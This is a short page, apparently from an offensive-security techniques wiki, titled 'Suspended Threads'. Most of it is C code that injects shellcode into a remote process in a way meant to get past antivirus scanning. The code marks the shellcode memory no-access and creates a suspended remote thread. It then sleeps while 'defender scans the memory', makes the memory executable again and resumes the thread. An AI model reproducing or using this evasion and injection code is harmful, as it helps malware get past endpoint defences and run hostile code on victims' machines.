Suspended Threads

printf("[+] Changing memory protection, marking it as PAGE_NO_ACCESS\n");
//Mark memory as PAGE_NOACCESS (0x1)
myVirtualProtectEx(hProcess, pRemoteBuffer, SHELLCODE_MEMORY_SIZE, PAGE_NOACCESS, &protect); // out uint lpflOldProtect ?

// create suspended remote thread
//IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0x00000004, out hThread);

// CREATE_SUSPENDED = 0x00000004
printf("[+] Creating suspended remote thread\n");
hRemoteThread = myCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, CREATE_SUSPENDED, NULL);

//sleep 15 seconds while defender scans the memory
printf("[+] Sleeping for 15 seconds...\n");

//CronosSleep(15);
Sleep(15000);

// Mark memory as executable again; PAGE_EXECUTE_READWRITE (0x40)
printf("[+] Changing memory protection back, marking it as PAGE_EXECUTE_READWRITE\n");
myVirtualProtectEx(hProcess, pRemoteBuffer, SHELLCODE_MEMORY_SIZE, PAGE_EXECUTE_READWRITE, &protect);

printf("[+] Resuming remote thread\n");
myResumeThread(hRemoteThread);
PreviousDynamic API Resolution NextPPID Spoofing
Last updated 1 year ago